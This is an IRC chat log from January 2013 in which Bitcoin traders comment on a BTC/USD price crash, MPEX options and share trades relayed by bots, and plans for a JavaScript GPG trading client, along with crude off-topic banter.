22:20:13 maybe i'll touch 200DMA and go back... Jan 24 22:20:35 *it'll Jan 24 22:20:35 seems a reasonable target Jan 24 22:20:52 doubt it. Jan 24 22:21:16 [MPEX] [O.BTCUSD.P330T] 1000 @ 1.00308118 = 1003.0812 BTC [+] Jan 24 22:21:18 [MPEX] [O.BTCUSD.P340T] 1000 @ 1.07044727 = 1070.4473 BTC [+] Jan 24 22:21:19 [MPEX] [O.BTCUSD.P350T] 1000 @ 1.13781337 = 1137.8134 BTC [+] Jan 24 22:21:22 ouch Jan 24 22:21:25 ouuuuuuch Jan 24 22:21:51 The person who sold tons of put is going to hurt... Jan 24 22:21:55 he better cover before the bot turns off Jan 24 22:22:04 Namworld thats what you are watching Jan 24 22:22:04 still a few hours Jan 24 22:23:56 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.06147599 = 61.476 BTC [-] Jan 24 22:24:35 A few hours? Jan 24 22:24:53 options expiration -- end of month, bot closes Jan 24 22:25:04 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.02486174 = 24.8617 BTC [-] Jan 24 22:25:10 no quotes 24 hours before option expiration Jan 24 22:25:18 ah yeah Jan 24 22:26:35 still, market is very fragile. Jan 24 22:26:44 what broke it was what, a 10k sale ? pff, that's what, nothing. Jan 24 22:26:52 yeah Jan 24 22:27:08 someone trying to get some more cheap Jan 24 22:27:34 Hence why I said, break it Jan 24 22:27:43 [MPEX] [O.BTCUSD.P180T] 1 @ 0.02000254 BTC [+] Jan 24 22:27:49 After all those puts/calls were sold/bought Jan 24 22:28:00 You have the money for that... Jan 24 22:28:10 well, the theory of my bot seems to be perfect, it bought in at 13.9ish, tried to sell at 19.19 Jan 24 22:28:15 meh Jan 24 22:28:50 oh god yes Jan 24 22:29:03 someone is back in for 3k @ 15.75 Jan 24 22:29:30 aww at this rate i won't be worth 10mn anymore ;/ Jan 24 22:29:31 or maybe 5000, 3000 remain on the bidside Jan 24 22:29:42 ;;ticker Jan 24 22:29:43 BTCUSD ticker | Best bid: 15.95000, Best ask: 16.20000, Bid-ask spread: 0.25000, Last trade: 16.20000, 24 hour volume: 146598.15832893, 24 hour low: 15.75210, 24 hour high: 19.18999, 24 hour vwap: 17.97952 Jan 24 22:29:49 under 16! Jan 24 22:29:53 wow Jan 24 22:29:59 this is fun! :D Jan 24 22:30:44 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.02233941 = 22.3394 BTC [-] Jan 24 22:30:46 [MPEX] [O.BTCUSD.P330T] 1000 @ 1.01666667 = 1016.6667 BTC [+] Jan 24 22:30:47 [MPEX] [O.BTCUSD.P340T] 1000 @ 1.08444445 = 1084.4445 BTC [+] Jan 24 22:30:48 [MPEX] [O.BTCUSD.P350T] 1000 @ 1.15222223 = 1152.2222 BTC [+] Jan 24 22:31:08 [HAVELOCK] [SDICE] 1 @ 0.4625 BTC [-] Jan 24 22:32:08 [HAVELOCK] [SDICE] 3 @ 0.44 = 1.32 BTC [-] Jan 24 22:33:15 [MPEX] [O.BTCUSD.C170T] 1 @ 0.05729813 BTC [-] Jan 24 22:33:17 [MPEX] [O.BTCUSD.C170T] 999 @ 0.05572223 = 55.6665 BTC [-] Jan 24 22:34:38 MtGox is having a hard time keeping up Jan 24 22:34:41 Slowing down Jan 24 22:36:31 bottom at 15.7 or so Jan 24 22:38:56 if I hadn't reversed positions Jan 24 22:39:01 my ass would be so fucked Jan 24 22:40:09 it's taking a few minutes to get order results Jan 24 22:40:19 (on gox) Jan 24 22:40:34 did you write your own bot or is there an open source one? Jan 24 22:40:41 it's my own code Jan 24 22:40:46 heh goxline just randomly loaded for the first time today Jan 24 22:40:53 Wall at 16 forming (on the ask side!) Jan 24 22:40:53 nicely done. Jan 24 22:41:03 with the greenline covering the 1 in 15, did a double take Jan 24 22:41:04 Bugpowder think about the guy with the puts lol. Jan 24 22:41:24 5.78 wat Jan 24 22:41:41 [MPEX] [O.BTCUSD.P330T] 1000 @ 1.02164811 = 1021.6481 BTC [+] Jan 24 22:41:43 [MPEX] [O.BTCUSD.P340T] 1000 @ 1.08957684 = 1089.5768 BTC [+] Jan 24 22:41:44 [MPEX] [O.BTCUSD.P350T] 1000 @ 1.15750557 = 1157.5056 BTC [+] Jan 24 22:42:01 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.02132762 = 21.3276 BTC [-] Jan 24 22:42:10 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.05361248 = 53.6125 BTC [-] Jan 24 22:42:25 is there such thing as an open source bot for trading? Jan 24 22:42:41 deadweasel: ya, there are a couple of old ones, iirc Jan 24 22:43:09 also, one of the first bots i made may as well be open source Jan 24 22:43:44 the guy who was selling it for me ended up cheating me out of btc from sales, and also started giving to code away Jan 24 22:44:16 ask that inba guy from bfl or rg, they should have a copy of it Jan 24 22:44:29 ugly ugly java Jan 24 22:44:50 how much for your new one? :) Jan 24 22:45:35 yeah, smickles, you selling? Jan 24 22:45:38 :) Jan 24 22:46:12 here's one, maybe: http://code.google.com/p/ga-bitbot/wiki/QuickStartGuide Jan 24 22:47:15 this bot is probably not ready for prime time, and i'm working on something else right now Jan 24 22:49:31 [MPEX] [S.MPOE] 5907 @ 0.00066289 = 3.9157 BTC [-] Jan 24 22:49:33 [MPEX] [S.MPOE] 19289 @ 0.00065263 = 12.5886 BTC [-] Jan 24 22:49:34 [MPEX] [S.MPOE] 2604 @ 0.00064913 = 1.6903 BTC [-] Jan 24 22:50:37 [MPEX] [O.BTCUSD.C180T] 7 @ 0.00950861 = 0.0666 BTC [-] Jan 24 22:51:04 [MPEX] [O.BTCUSD.P330T] 1000 @ 1.0279062 = 1027.9062 BTC [+] Jan 24 22:51:06 [MPEX] [O.BTCUSD.P340T] 1000 @ 1.09602457 = 1096.0246 BTC [+] Jan 24 22:51:06 [MPEX] [O.BTCUSD.P350T] 1000 @ 1.16414294 = 1164.1429 BTC [+] Jan 24 22:51:24 lol, buying calls for 666 Jan 24 22:52:00 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.05096204 = 50.962 BTC [-] Jan 24 22:52:16 The Devil has spoken! Jan 24 22:52:20 Buy calls! Jan 24 22:52:27 You've been warned! Jan 24 22:52:33 =P Jan 24 22:52:36 [MPEX] [O.BTCUSD.C180T] 993 @ 0.02012899 = 19.9881 BTC [+] Jan 24 22:53:32 didn't mircea ran out of funds yest? or someone else is selling? Jan 24 22:53:47 the devil? >:D Jan 24 22:53:47 He unran out of funds? Jan 24 22:53:57 [MPEX] [S.MPOE] 20000 @ 0.00067999 = 13.5998 BTC [+] Jan 24 22:53:58 jurov: the devil bought tho Jan 24 22:53:58 [MPEX] [S.MPOE] 9222340 @ 0.00068 = 6271.1912 BTC [+] Jan 24 22:54:02 [MPEX] [S.MPOE] 19300 @ 0.00068773 = 13.2732 BTC [+] Jan 24 22:54:03 [MPEX] [S.MPOE] 8550 @ 0.00068976 = 5.8974 BTC [+] Jan 24 22:54:05 [MPEX] [S.MPOE] 729810 @ 0.0007 = 510.867 BTC [+] Jan 24 22:54:13 wow Jan 24 22:54:16 oooo Jan 24 22:54:21 my god Jan 24 22:54:28 dude today is like 0.0 Jan 24 22:54:42 we know nao where mircea got funds Jan 24 22:55:10 in the past 18 or so hours mpex traded like 70k btc Jan 24 22:55:15 this is about as much as mtgox. Jan 24 22:55:23 nice! Jan 24 22:55:33 mkay... Jan 24 22:55:44 looks like it's always safest betting on the house Jan 24 22:55:47 and i guess the puts aren't done unwinding either Jan 24 22:55:51 (MPOE/DICE) Jan 24 22:56:06 !ticker m s.mpoe Jan 24 22:56:08 [MPEX:S.MPOE] 1D: 0.00059613 / 0.00067017 / 0.0007 (12528519 shares, 8,396.32 BTC), 7D: 0.00059445 / 0.00065297 / 0.0007 (23984391 shares, 15,661.25 BTC), 30D: 0.00059445 / 0.00065046 / 0.0007 (51436785 shares, 33,457.73 BTC) Jan 24 22:57:30 sooo this 7k... Jan 24 22:57:33 should i sell it ? Jan 24 22:57:38 send it to s.dice ? Jan 24 22:57:47 maybe donate it to foundation ? Jan 24 22:57:49 loller Jan 24 22:57:52 hahaha Jan 24 22:58:29 donate to foundation Jan 24 22:58:34 omg no Jan 24 22:58:44 i think i'll buy eleventy fanboxes Jan 24 22:58:44 whoa .0007 wtf Jan 24 22:58:45 You should donate it my way, of course. The hookers & blows foundation. Jan 24 22:58:59 hookers and blows lol Jan 24 22:59:08 lol, send it to the NoAgenda guys Jan 24 22:59:08 lol Jan 24 22:59:12 is it time for http://cat-bounce.com/ yet? Jan 24 22:59:13 smickles Jan 24 22:59:23 It's the best foundation ever Jan 24 22:59:26 bah. just play sdice Jan 24 22:59:32 according to reviews by myself. Jan 24 22:59:41 yeah, all on the least likely winner Jan 24 23:00:09 smickles if he took a 7k bet Jan 24 23:00:10 i might :D Jan 24 23:00:48 "mpex owner sells 7k btc worth of shares, puts it all on < 1000, wins, drives s.dice out of business. s,mpoe shares collapse. win." Jan 24 23:01:13 ;;calc 64000*7000 Jan 24 23:01:14 448000000 Jan 24 23:01:35 look ma, only 20 times more than total bitcoins Jan 24 23:01:55 lol Jan 24 23:02:00 [MPEX] [O.BTCUSD.P330T] 1000 @ 1.03041923 = 1030.4192 BTC [+] Jan 24 23:02:01 [MPEX] [O.BTCUSD.P340T] 1000 @ 1.09861376 = 1098.6138 BTC [+] Jan 24 23:02:03 [MPEX] [O.BTCUSD.P350T] 1000 @ 1.16680828 = 1166.8083 BTC [+] Jan 24 23:02:07 this guy again Jan 24 23:02:14 this poor guy, doing the cover walk of shamwe Jan 24 23:02:19 yeah Jan 24 23:02:20 :/ Jan 24 23:02:37 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.01961092 = 19.6109 BTC [-] Jan 24 23:02:43 loool maybe the guys who bought MPBPT at 120% base value knew something Jan 24 23:02:54 haha Jan 24 23:03:16 http://www.youtube.com/watch?v=alc0gG0u48M Jan 24 23:03:28 has this been liek the most exciting day of the year ? Jan 24 23:03:36 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.04989771 = 49.8977 BTC [-] Jan 24 23:03:43 ;;ticker Jan 24 23:03:44 BTCUSD ticker | Best bid: 16.55000, Best ask: 16.75000, Bid-ask spread: 0.20000, Last trade: 16.75000, 24 hour volume: 155025.93930585, 24 hour low: 15.61010, 24 hour high: 19.18999, 24 hour vwap: 17.86152 Jan 24 23:05:34 So far, most exciting day of the year Jan 24 23:06:49 finally stable Jan 24 23:06:50 all 25 days of it Jan 24 23:06:56 hahah Jan 24 23:07:40 22:06.42 ( thestringpuller ) finally stable <- 12 minutes after major drop lol Jan 24 23:07:49 nah... it just stopped for a few minutes... Jan 24 23:07:54 Who knows what's next Jan 24 23:07:55 this is actually -otc Jan 24 23:08:09 dub :( Jan 24 23:08:10 any movement at all is either a rally or crash Jan 24 23:08:10 asks are raising Jan 24 23:08:10 kakobrekla: my price spec was set at 16.32 Jan 24 23:08:27 dub: of course Jan 24 23:08:44 the rally or crash of some guy with a small wallet Jan 24 23:09:13 something small to unwind: http://www.businessinsider.com/eric-schmidt-wrote-the-most-hilariously-self-defeating-email-you-will-ever-read-2013-1 Jan 24 23:09:25 lol, what would -otc look like if your total btc worth was in place of your nick Jan 24 23:09:26 well yeah, when mom gives you $5/week pocket money Jan 24 23:09:55 i get 6$ Jan 24 23:09:56 or better yet, the forum Jan 24 23:10:18 kakobrekla: I get $10 but I have to mow the lawn and take out hte trash Jan 24 23:10:29 and tidy my room every day Jan 24 23:10:31 :( Jan 24 23:10:39 oh, that way over the 4$ difference Jan 24 23:10:52 btw, did anyone else notice the guy wondering what was up with his SD bet, Jan 24 23:11:09 [MPEX] [O.BTCUSD.P330T] 1000 @ 1.03293789 = 1032.9379 BTC [+] Jan 24 23:11:10 he bet the minimum amount Jan 24 23:11:11 [MPEX] [O.BTCUSD.P340T] 1000 @ 1.10120873 = 1101.2087 BTC [+] Jan 24 23:11:12 [MPEX] [O.BTCUSD.P350T] 1000 @ 1.16947958 = 1169.4796 BTC [+] Jan 24 23:11:14 ugly... and would need to be changed often Jan 24 23:11:18 gave a .0001 fee Jan 24 23:11:38 and complained that it didn't get confirmed quickly Jan 24 23:11:52 peeps said he should've used a .0005 fee Jan 24 23:11:57 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.01910662 = 19.1066 BTC [-] Jan 24 23:11:59 he said that he couldn't afford it Jan 24 23:12:04 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.04883101 = 48.831 BTC [-] Jan 24 23:12:14 lol Jan 24 23:12:40 Who can afford the electricity of running a computer, or the cost of traveling to the library to a public computer and can't afford 0.0005 btc? Jan 24 23:12:45 dude sold his baseball cards to buy that bet Jan 24 23:13:29 did he lose ? Jan 24 23:13:46 mircea_popescu: i hope so Jan 24 23:13:57 soo... chick bought me slippers. they have a tag. Jan 24 23:13:58 it says Jan 24 23:13:59 last that I read, it hadn't processed on SD yet Jan 24 23:13:59 FARTEX Jan 24 23:14:01 collection Jan 24 23:14:06 lol Jan 24 23:14:11 fart-ex? Jan 24 23:14:17 just fartex Jan 24 23:14:36 this must not be an english speaking company Jan 24 23:14:38 pic Jan 24 23:14:49 kakobrekla you pay .1 btc for pic of my fartex ? Jan 24 23:14:52 pic of slipper on head Jan 24 23:15:00 dub was gonna do on butt. Jan 24 23:15:02 (not that head) Jan 24 23:15:09 lol Jan 24 23:15:37 course a few days ago i saw a perfume named Jan 24 23:15:39 B.O. Jan 24 23:15:40 mircea_popescu: make it 0.000001 and you've got a deal Jan 24 23:16:06 its all I can afoord after buying in at 19.19 Jan 24 23:16:18 yeah i cant afford that too Jan 24 23:16:39 with 6bucks a month Jan 24 23:16:45 buncha bums why don't you get a jewb Jan 24 23:16:46 like half a coin Jan 24 23:17:00 i do have job, Jan 24 23:17:06 selling slipper pic on the net Jan 24 23:17:08 but noone buys Jan 24 23:17:21 cause they're not fartex enough Jan 24 23:17:40 o, so you have many sales? Jan 24 23:18:09 https://bitcointalk.org/index.php?topic=134986.0 thread of win Jan 24 23:18:11 if so, someone must have leaked the pics on the torrents Jan 24 23:18:25 you know fart porn exists right? Jan 24 23:18:39 doesnt porn exist? Jan 24 23:18:49 well yes Jan 24 23:18:52 dub actyally a few years ago some dood was sent to jale Jan 24 23:19:02 because he and a coworker (female) played around with compressed air Jan 24 23:19:08 by means of inserting the hose in her hole Jan 24 23:19:12 and she died of it. Jan 24 23:19:21 ouch Jan 24 23:19:25 Why do people think that glbse has given out all shareholder info? Jan 24 23:19:30 exploded colon Jan 24 23:19:33 http://www.tofugu.com/2012/02/18/japanese-fart-scrolls/ Jan 24 23:19:40 smickles through sheer mental exhaustion ? Jan 24 23:20:43 https://bitcointalk.org/index.php?topic=118354.msg1476511#msg1476511 otherwise bunches of people complaining Jan 24 23:22:07 [MPEX] [O.BTCUSD.P330T] 1000 @ 1.03546219 = 1035.4622 BTC [+] Jan 24 23:22:09 [MPEX] [O.BTCUSD.P340T] 1000 @ 1.10380953 = 1103.8095 BTC [+] Jan 24 23:22:10 [MPEX] [O.BTCUSD.P350T] 1000 @ 1.17215687 = 1172.1569 BTC [+] Jan 24 23:23:34 [MPEX] [S.MPOE] 5500 @ 0.0006537 = 3.5954 BTC [-] Jan 24 23:23:35 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.01860172 = 18.6017 BTC [-] Jan 24 23:24:16 [16:19] Why do people think that glbse has given out all shareholder info? Jan 24 23:24:19 [16:19] exploded colon Jan 24 23:24:23 best out of context answer of the day Jan 24 23:24:49 >D Jan 24 23:24:57 death by exploded colon Jan 24 23:24:57 haha Jan 24 23:25:06 threaten someone with that Jan 24 23:25:18 compressed air on the skin is bad ju-ju Jan 24 23:25:23 let alone vaginal Jan 24 23:25:35 what a ride on gox today Jan 24 23:25:39 my sho class teacher taught me that in 5th grade Jan 24 23:25:43 *shop Jan 24 23:25:50 you had a vagina in 5th grade ? Jan 24 23:25:51 kept seeing my sells go off every .1 BTC up to 19.29 IIRC Jan 24 23:25:53 smickles: It has for at least all the assets I've known... Jan 24 23:25:56 certainly Jan 24 23:25:59 then see down to 15.75 Jan 24 23:26:00 I don't know about small ones Jan 24 23:26:02 my shop teacher was like Jan 24 23:26:03 grrr Jan 24 23:26:13 [MPEX] [S.MPOE] 4850 @ 0.00065336 = 3.1688 BTC [-] Jan 24 23:26:20 no air hoses in vaginas Jan 24 23:26:40 [MPEX] [S.DICE] 1800 @ 0.00605813 = 10.9046 BTC [+] Jan 24 23:26:41 [MPEX] [S.DICE] 105 @ 0.00616081 = 0.6469 BTC [+] Jan 24 23:26:42 [MPEX] [S.DICE] 1000 @ 0.00620779 = 6.2078 BTC [+] Jan 24 23:26:44 [MPEX] [S.DICE] 1200 @ 0.0062078 = 7.4494 BTC [+] Jan 24 23:26:45 [MPEX] [S.DICE] 1600 @ 0.00629237 = 10.0678 BTC [+] Jan 24 23:26:46 you went to a coed school, how middle class Jan 24 23:26:46 [MPEX] [S.DICE] 1468 @ 0.00630989 = 9.2629 BTC [+] Jan 24 23:26:57 Namworld: it hasn't for mpoe.etf Jan 24 23:27:12 dub thats so snide Jan 24 23:27:15 i love it Jan 24 23:27:22 and I have about 40 btc to distribute to people Jan 24 23:27:36 (as much as I would love to just keep it) Jan 24 23:27:39 jcpham: I thought so Jan 24 23:28:32 dude why'd you go to a cockfest school ? Jan 24 23:28:39 if there weren't girls i wouldn't have ever went. Jan 24 23:29:30 [MPEX] [S.DICE] 956 @ 0.00630989 = 6.0323 BTC [+] Jan 24 23:29:35 its where they go to learn with all the other banker's kids Jan 24 23:29:38 we had the girlies Jan 24 23:29:52 back in my day Jan 24 23:30:16 we had the catholic girls school up the road Jan 24 23:30:53 and as we know, catholic school girls rule Jan 24 23:31:06 [MPEX] [O.BTCUSD.P330T] 1000 @ 1.03799215 = 1037.9922 BTC [+] Jan 24 23:31:08 [MPEX] [O.BTCUSD.P340T] 1000 @ 1.10641616 = 1106.4162 BTC [+] Jan 24 23:31:09 [MPEX] [O.BTCUSD.P350T] 1000 @ 1.17484016 = 1174.8402 BTC [+] Jan 24 23:31:27 except they don't like abortions :< Jan 24 23:31:52 *their parents don't like abortions Jan 24 23:32:50 http://i.imgur.com/gg3PhAz.png Jan 24 23:32:56 anal sex rarely leads to abortions Jan 24 23:32:56 new SD report Jan 24 23:33:00 looks lolish Jan 24 23:33:07 haha mp Jan 24 23:33:16 46k ? Jan 24 23:34:55 ok so! 24 hour mpex volume 74`923.02599233 Jan 24 23:35:13 new record and all that Jan 24 23:36:44 45K yes Jan 24 23:36:59 wow nearly 75k! Jan 24 23:37:10 ;;calc 75000*0.002 Jan 24 23:37:10 150 Jan 24 23:37:21 hubba hubba Jan 24 23:38:39 yeah, true, mtgox charges like 5x that. Jan 24 23:39:11 lol, i did not meant it that way, just curious Jan 24 23:39:54 [MPEX] [S.MPOE] 4000 @ 0.00064913 = 2.5965 BTC [-] Jan 24 23:39:58 Fees are low. Only 150 BTC Jan 24 23:40:10 But yeah, it's like a stock exchange Jan 24 23:40:22 Low fees for people with a direct trading spot Jan 24 23:40:34 one of these days it's gonna be securities volume > currency exchange volume Jan 24 23:40:41 and once that happens, it's never going back Jan 24 23:41:55 do you have some projections? in 2012 volume was steady 50-100K/mo Jan 24 23:42:05 monthly Jan 24 23:42:46 and i doubt such whale ops as today will be a rule Jan 24 23:42:58 in RL, forex is much larger than stocks Jan 24 23:43:26 kakobrekla exchange != forex imo Jan 24 23:43:53 and if you shed the notional and compare actual trades... Jan 24 23:44:07 jurov i would guess 2014-2015 Jan 24 23:45:41 [MPEX] [S.MPOE] 6946 @ 0.00064913 = 4.5089 BTC [-] Jan 24 23:45:43 [MPEX] [S.MPOE] 7004 @ 0.00064736 = 4.5341 BTC [-] Jan 24 23:46:26 i guess forex profitablility for more and more traders will sink below inflation soon.. and then mayhem ensues Jan 24 23:46:57 moreover the thing with forex is, you trade on huge leverage Jan 24 23:47:08 so if you deposit 100 bux and trade 10k jpy/eur Jan 24 23:47:20 what's the fair measure of the trade volume ? 100 bux ? or 10k ? Jan 24 23:48:03 https://bitcointalk.org/index.php?topic=12156.msg1475494#msg1475494 Jan 24 23:48:03 [MPEX] [S.MPOE] 4096 @ 0.00064736 = 2.6516 BTC [-] Jan 24 23:48:04 [MPEX] [S.MPOE] 17054 @ 0.00064672 = 11.0292 BTC [-] Jan 24 23:48:06 lmao seems she called it Jan 24 23:48:15 same goes for mpex, you do offer margin and stuff Jan 24 23:48:56 lol Jan 24 23:49:52 yeh, i do, unlike mtgox Jan 24 23:50:02 but i was talking in the shares/forex irl comparison! Jan 24 23:50:35 well, you can trade shares with margin in rl? Jan 24 23:50:58 ya but not quite the same. 2-4x on stocks, 10-50x on forex Jan 24 23:51:09 then again... derivatives, do you count them as forex or as securities ? Jan 24 23:51:10 and its forex's fault. Jan 24 23:51:13 :D Jan 24 23:51:45 yeah we can split hairs here Jan 24 23:51:52 tbh what mtgox does is simply exchange Jan 24 23:51:56 not in any way forex Jan 24 23:52:27 hm, CFDs require only 3%-15% margin Jan 24 23:52:47 there's stuff the banks trade for as little a 2% Jan 24 23:52:55 .2% Jan 24 23:53:58 anyway, im off. catch you all tomorrow Jan 24 23:54:11 mircea_popescu: process my deposit first! :p Jan 24 23:54:27 eh Jan 24 23:54:29 pretty please! Jan 24 23:54:45 aite. Jan 24 23:54:48 with cream and cherry on top. Jan 24 23:55:01 whoop thanks! Jan 24 23:55:18 i gotta, cause if not those ppl are capable of buying his pt to like .8 Jan 24 23:55:39 !ticker m s.dice Jan 24 23:55:40 [MPEX:S.DICE] 1D: 0.00085848 / 0.00390419 / 0.00699 (583708 shares, 2,278.91 BTC), 7D: 0.00085848 / 0.00447834 / 0.00699 (967990 shares, 4,334.99 BTC), 30D: 0.00085848 / 0.00416496 / 0.00699 (10216311 shares, 42,550.59 BTC) **** BEGIN LOGGING AT Fri Jan 25 07:32:52 2013 Jan 25 07:33:37 mr.p. Jan 25 07:36:32 heya mr k. Jan 25 07:42:53 !ticker m s.dice Jan 25 07:42:57 [MPEX:S.DICE] 1D: 0.00085848 / 0.00381004 / 0.00699 (551781 shares, 2,102.31 BTC), 7D: 0.00085848 / 0.00447518 / 0.00699 (962889 shares, 4,309.11 BTC), 30D: 0.00085848 / 0.00416676 / 0.00699 (10220055 shares, 42,584.56 BTC) Jan 25 07:43:24 ;;calc 0.00632181 / 0.00063310 Jan 25 07:43:24 9.98548412573 Jan 25 07:43:32 whoa they are reaching parity! Jan 25 07:46:02 [HAVELOCK] [KCIM] 3 @ 0.98911 = 2.9673 BTC [-] Jan 25 07:46:30 Should I fund the development a software for MPEx with a GUI? Jan 25 07:46:45 you mean coinbr? Jan 25 07:46:55 No, for direct traders Jan 25 07:47:04 like pympex but with a GUI Jan 25 07:47:09 hm Jan 25 07:47:09 and dropdowns Jan 25 07:47:29 seems like command line is sometimes too slow when you want to trade fast Jan 25 07:47:52 make a JS client Jan 25 07:48:23 hmm Jan 25 07:48:55 why js? Jan 25 07:49:32 cause its super awesome, fast, cross platorm, etc etc ? Jan 25 07:49:47 I guess you're right Jan 25 07:50:39 Can even put it online. Jan 25 07:50:45 ya Jan 25 07:50:58 but what about using the user's gpg certificate... Jan 25 07:51:24 http://www.hanewin.net/encrypt/ Jan 25 07:51:42 [BTCTC] [GSDPT] 399 @ 0.0063 = 2.5137 BTC [+] Jan 25 07:53:04 anyway Jan 25 07:53:09 its 7am so im off to bed Jan 25 07:53:12 later Jan 25 07:53:32 later Jan 25 07:54:16 [MPEX] [S.MPOE] 5400 @ 0.00063261 = 3.4161 BTC [-] Jan 25 07:54:17 [MPEX] [S.MPOE] 2100 @ 0.0006331 = 1.3295 BTC [+] Jan 25 07:57:31 dude you're supposed to wake up at 7am, Jan 25 07:57:33 not to go sleep Jan 25 07:58:02 time is arbitrary Jan 25 07:58:05 Namworld :" the blockchain people have some method of using a javascript that allows the user to handle his addresses Jan 25 07:58:11 the same principle could be used with certs too im sure. Jan 25 08:02:51 [MPEX] [S.MPOE] 11330 @ 0.0006331 = 7.173 BTC [+] Jan 25 08:02:52 [MPEX] [S.MPOE] 1370 @ 0.00063769 = 0.8736 BTC [+] Jan 25 08:04:40 [MPEX] [S.MPOE] 6147 @ 0.00063046 = 3.8754 BTC [-] Jan 25 08:04:42 [MPEX] [S.MPOE] 15461 @ 0.00062765 = 9.7041 BTC [-] Jan 25 08:04:43 [MPEX] [S.MPOE] 26366 @ 0.00062555 = 16.4933 BTC [-] Jan 25 08:04:44 [MPEX] [S.MPOE] 8418 @ 0.000624 = 5.2528 BTC [-] Jan 25 08:04:46 [MPEX] [S.MPOE] 4200 @ 0.00062167 = 2.611 BTC [-] Jan 25 08:04:47 [MPEX] [S.MPOE] 11550 @ 0.00062105 = 7.1731 BTC [-] Jan 25 08:04:48 [MPEX] [S.MPOE] 2858 @ 0.00062071 = 1.774 BTC [-] Jan 25 08:09:30 !ticker m s.mpoe Jan 25 08:09:32 !ticker m s.dice Jan 25 08:09:32 [MPEX:S.MPOE] 1D: 0.00059613 / 0.00067264 / 0.0007 (12311765 shares, 8,281.44 BTC), 7D: 0.00059445 / 0.00065233 / 0.0007 (23989321 shares, 15,649.06 BTC), 30D: 0.00059445 / 0.00065039 / 0.0007 (51770531 shares, 33,671.44 BTC) Jan 25 08:09:34 [MPEX:S.DICE] 1D: 0.00085848 / 0.00381004 / 0.00699 (551781 shares, 2,102.31 BTC), 7D: 0.00085848 / 0.00447518 / 0.00699 (962889 shares, 4,309.11 BTC), 30D: 0.00085848 / 0.00416676 / 0.00699 (10220055 shares, 42,584.56 BTC) Jan 25 08:10:40 [MPEX] [S.MPOE] 5000 @ 0.00063769 = 3.1885 BTC [+] Jan 25 08:16:29 good... I'll get that started Jan 25 08:17:07 if experience is any guide adding a confirm screen will be valuable. Jan 25 08:18:45 yes Jan 25 08:22:52 ahh i love open development. Jan 25 08:23:06 i suspected i might, but srsly, it kicks ass. Jan 25 08:23:31 i don't understand all the other kids managing their in house programming staff to do anything and everything. Jan 25 08:24:02 +1 Jan 25 08:24:26 [MPEX] [O.BTCUSD.C160T] 3 @ 0.08860882 = 0.2658 BTC [-] Jan 25 08:24:35 awe crap Jan 25 08:24:39 I'd outsource the development... Jan 25 08:24:58 it depends Jan 25 08:25:00 if you outsource it you still have to manage it Jan 25 08:25:13 Yeah Jan 25 08:25:25 contrary to what people think, management is the largest cost of doing business Jan 25 08:25:27 *whew* Jan 25 08:25:31 marketing is just more visible, that's all. Jan 25 08:25:48 sorry! :D Jan 25 08:25:49 But in javascript... just get a field for user private certificate and some input field for the string. Jan 25 08:26:11 http://www.youtube.com/watch?v=W18URB6qYeY this nana lovich bitch is actually doing pretty good. Jan 25 08:26:13 sign, encrypt, post, read reply, decrypt, display Jan 25 08:26:26 Should not be too much Jan 25 08:26:53 I'll do the styling myself and market it. Jan 25 08:27:11 there needs to be some integrity check Jan 25 08:27:39 try mega's stuff ;-) Jan 25 08:27:55 mega's? Jan 25 08:28:40 if it's javascript, anyone can review the code themselve/take it to put it on their own server/etc Jan 25 08:28:47 yes. Jan 25 08:28:48 [MPEX] [O.BTCUSD.C160T] 1 @ 0.0726088 BTC [-] Jan 25 08:28:49 and verify it only posts to mpex.co Jan 25 08:29:36 Namworld: javascript doesn't imply reviewability Jan 25 08:29:41 (try Google) Jan 25 08:29:41 [MPEX] [S.MPOE] 6450 @ 0.00063192 = 4.0759 BTC [-] Jan 25 08:29:47 sooo the swiss are also repatriating gold. Jan 25 08:30:02 dear all, gtf out of dollars this spring. Jan 25 08:30:05 I heard that about Germans recently Jan 25 08:30:14 by winter there many no longer be a us dollar. Jan 25 08:30:19 sgnb yep Jan 25 08:30:39 [MPEX] [O.BTCUSD.C160N] 3 @ 0.28263961 = 0.8479 BTC [+] Jan 25 08:30:45 actually, I think programming big stuff in Javascript is stupid Jan 25 08:31:05 (compared to programming in a saner language and compile it to Javascript) Jan 25 08:31:13 [MPEX] [O.BTCUSD.P160N] 3 @ 0.18767611 = 0.563 BTC [-] Jan 25 08:31:27 i think by all definitions this would be small stuff tho Jan 25 08:31:30 what is it, string parsing Jan 25 08:31:37 pretty much Jan 25 08:31:45 like computer programming 101 Jan 25 08:31:50 "parse this string" Jan 25 08:32:00 is there an openpgp library out there? Jan 25 08:32:01 and possibly just use dropdowns and aggregate each value in the string Jan 25 08:32:05 (I mean, JS library) Jan 25 08:32:12 adding the " | | | " around each input Jan 25 08:32:15 sgnb i think someone linked something earlier Jan 25 08:32:27 ah Jan 25 08:32:29 It's really just a quick use form for MPEx Jan 25 08:32:38 then, ok, it should be really simple Jan 25 08:32:47 [MPEX] [O.BTCUSD.C170N] 3 @ 0.24953651 = 0.7486 BTC [+] Jan 25 08:33:01 gpg + string parsing/posting Jan 25 08:34:46 [MPEX] [O.BTCUSD.P170N] 3 @ 0.22492555 = 0.6748 BTC [-] Jan 25 08:35:54 [MPEX] [S.MPOE] 14308 @ 0.00062071 = 8.8811 BTC [-] Jan 25 08:47:15 [MPEX] [S.MPOE] 2100 @ 0.00062848 = 1.3198 BTC [+] Jan 25 08:47:47 [MPEX] [O.BTCUSD.C160T] 1 @ 0.07244845 BTC [-] Jan 25 08:52:01 [MPEX] [O.BTCUSD.C160T] 1 @ 0.07260014 BTC [+] Jan 25 08:55:49 [MPEX] [S.MPOE] 2500 @ 0.00062071 = 1.5518 BTC [-] Jan 25 08:56:48 http://www.h-online.com/security/news/item/Mega-s-first-crypto-faux-pas-1790286.html Jan 25 08:58:26 ya lol Jan 25 08:58:33 http://fail0verflow.com/blog/2013/megafail.html Jan 25 08:58:37 failover announced it yest. Jan 25 08:58:57 111111 222222 333333 444444 555555 666666 Jan 25 08:59:09 HA HA HA HA Jan 25 09:07:02 [MPEX] [S.MPOE] 5181 